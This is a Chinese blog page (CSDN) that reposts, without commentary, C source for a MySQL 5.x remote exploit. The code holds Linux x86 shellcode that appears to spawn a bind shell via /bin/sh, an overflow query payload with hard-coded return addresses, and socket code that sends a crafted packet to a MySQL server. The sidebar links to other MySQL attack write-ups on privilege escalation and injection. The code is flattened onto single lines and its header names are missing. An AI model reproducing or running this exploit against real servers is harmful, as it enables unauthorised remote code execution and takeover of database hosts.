mysql exploit_MySQL 5.X exploit

最新推荐文章于 2022-10-24 17:22:01 发布
最新推荐文章于 2022-10-24 17:22:01 发布
阅读量86 收藏
点赞数
文章标签: mysql exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31134719/article/details/113310586
版权

/* ****************************************************************MySQL_Exploit.cExp [-s socket]|[-h host][-p port]][-x]*****************************************************************/#include #include #include #include #include #include #include #include #include int thd = 0x8b1b338;int tbl = 0x8b3a880;#define USOCK2 "/tmp/mysql.sock"char addr_tdh[4];char addr_tbl[4];char addr_ret[4];#define TBL_POS 182#define THD_POS 178#define RET_POS 174#define SHL_POS 34char shcode[] = {0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84};int tmp_idx = 0;int dump_packet_len = 7;char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };int payload_len = 371;// header packet + select '0x39'char query_payload[] = {0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16   Some junk from position 6 ..., 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48, 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94, 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144, 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160, 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176, 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d // len=16*4+1=65;};int anon_pckt_len = 65;#define USOCK "/tmp/mysql2.sock"int tcp_conn(char *hostname, int port){int sockfd;struct sockaddr_in servaddr;struct hostent *hp;if ((hp = gethostbyname (hostname)) == 0){perror ("gethostbyname");exit (0);}if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0){perror ("socket");exit (1);}bzero ((char *) &servaddr, sizeof (servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons (port);memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);if (servaddr.sin_addr.s_addr <= 0){perror ("bad address after gethostbyname");exit (1);}if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0){perror ("connect");exit (1);}return sockfd;}int unix_conn (char *path){int fd, len;struct sockaddr_un sa;fd = socket (PF_UNIX, SOCK_STREAM, 0);if (fd < 0){perror ("cli: socket(PF_UNIX,SOCK_STREAM)");exit (1);}sa.sun_family = AF_UNIX;strcpy (sa.sun_path, path);len = sizeof (sa);if (connect (fd, (struct sockaddr *) &sa, len) < 0){perror ("cli: connect()");exit (1);}return fd;}int main (int argc, char *argv[]){int fd, i, ret;char packet[65535], buf[65535], *path, *host ,c;int port = 3306,db_len = 0;int pckt_len = anon_pckt_len, unix_sock = 1, anon_pckt[pckt_len];path = strdup (USOCK);host = strdup ("127.0.0.1");opterr = 0;while ((c = getopt (argc, argv, "s:h:p:n:")) != -1)switch (c){case 's':path = strdup (optarg);unix_sock = 1;break;case 'h':host = strdup (optarg);unix_sock = 0;break;case 'p':port = atoi (optarg);unix_sock = 0;break;case 'n':db_len = atoi (optarg);break;default: break;}bzero (packet, 65535);pckt_len = anon_pckt_len + db_len;printf ("%d\n", pckt_len);for (i = 0; i < pckt_len; i++) packet[i] = anon_pckt[i];if (db_len)for (i = anon_pckt_len - 2; i < pckt_len; i++) packet[i] = 'A';packet[pckt_len - 1] = '\0';packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;for (i = 0; i < pckt_len; i++) printf (" %.2x%c", (unsigned char) packet[i],((i + 1) % 16 ? ' ' : '\n'));printf ("\n");if (unix_sock) fd = unix_conn (path);else fd = tcp_conn (host, port);sleep (1);ret = recv (fd, buf, 65535, 0);if (send (fd, packet, pckt_len, 0) != pckt_len){perror ("cli: send(anon_pckt)");exit (1);}ret = recv (fd, buf, 65535, 0);for (i = 0; i < ret; i++) printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));printf ("\n");return 0;}

谈融
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 5.5 udf_MYSQL5漏洞之udf提权
weixin_28702613的博客
01-19 351
一、适用条件1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。3.有root账号密码二、导出udfMYSQL 5.1以下版本导出路径:C:Winntudf.dll2000C:Windowsudf.dll 2003(有的系统被转义,需要改为C:...
msf攻击Mysql服务.docx
04-26
5. **auxiliary/scanner/mysql/mysql_hashdump**:此模块用于从MySQL的`mysql.user`表中提取哈希值,虽然在实战中不如直接使用SQL语句灵活,但在某些情况下仍然有价值。 6. **auxiliary/admin/mysql/mysql_sql**:...
MySQL 5.X exploit
weixin_34151004的博客
05-27 74
/* **************************************************************** MySQL_Exploit.c Exp [-s socket]|[-h host][-p port]][-x] *************************************************************...
mysql unsha1_mysql-unsha1 在不知道明文密码的情况下对MySQL服务器进行身份验证
weixin_39940425的博客
01-19 114
mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with...
exploit mysql_MySQL 5.X exploit
weixin_30446393的博客
01-28 87
/* ****************************************************************MySQL_Exploit.cExp [-s socket]|[-h host][-p port]][-x]*****************************************************************/#include #inc...
Exploit - mysql unsha1
Nixawk
03-27 1312
mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with
MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE
weixin_33805992的博客
09-17 310
============================================= -Discoveredby:DawidGolunski -http://legalhackers.com-dawid(at)legalhackers.com -CVE-2016-6662 -Releasedate:12.09.2016 -Lastupdat...
MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c
09-22
"MySQL_Exploit.rar_0day_C 0day_Exploit_mysql c"这个标题暗示了存在一个针对MySQL的0day攻击方法,可能是通过C语言编写的代码实现。 描述中提到"MySQL_Exploit 0day 放好久了 今天传上来",意味着这个漏洞可能...
第八节 Mysql POST基于错误注入-01
最新发布
09-15
它可以自动化地检测和exploit SQL注入漏洞。在课程中,我们使用Sqlmap来进行POST注入测试,演示如何将Burpsuite截断的HTTP请求数据包复制到文本文件中,并使用Sqlmap来进行攻击测试。 本节课程讲解了Mysql POST基于...
基于Ubuntu系统-渗透MySQL数据库.docx
10-19
5. 登录数据库授权 在MySQL中,我们需要授权其他IP远程登录。使用以下命令授权: `GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password';` 6. 扫描Ubuntu IP 使用Kali虚拟机中的Nmap工具扫描Ubuntu...
go-exploitdb
05-04
go-exploitdb 这是用于从某些漏洞利用数据库中搜索...SQLite3,MySQL,PostgreSQL,Redis 最新版本 安装go-exploitdb $ mkdir -p $GOPATH /src/github.com/vulsio $ cd $GOPATH /src/github.com/vulsio $ git clone
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2506
【kali-漏洞利用】应用渗透攻击过程
MySQL II (MySQL, Exploit, Training)简单解法
滕青山博客
03-01 249
分析 从代码可以看到username password分开来验证。通常的利用方法是使用union构造已知MD5值的查询。 查询代码: $query = "SELECT * FROM users WHERE username='$username'"; username一栏填写123' union select 1,'admin',md5('password');# 构成sql语句: SELECT * FROM users WHERE username='123' union select
mysql一次性获取几十万数据_【奇技淫巧】Mysql注入时,猜不到列名,获取所有数据...
weixin_39959482的博客
12-05 383
有时候我们不知道列名,因为不能访问Information_Schema或者其他原因但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据我们有两个表 article、admin方案一select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT ...
MySQL数据库渗透及漏洞利用总结
05-09 4173
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
渗透项目(三):Raven
Ays.Ie的博客
10-24 710
本文记录了作者的第三个渗透项目,努力学习的一天,将自己在渗透时的思路和渗透方法记录下来,为了更好的理解。继续努力~
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4020
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
Mysql本地提权漏洞/写my.cnf文件命令执行漏洞
Exploit的小站~
05-10 9663
0x00 漏洞影响 MySQL <= 5.7.15远程代码执行/ 提权 (0day) 5.6.33 5.5.52 Mysql分支的版本也受影响,包括: MariaDB PerconaDB 0x01 条件 (1)可以在低权(需要有FILE权限)账户下执行 (2)可以执行sql,最好是个webshell或者phpmyadmin里 (3)Mysql 5.5版本以上 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值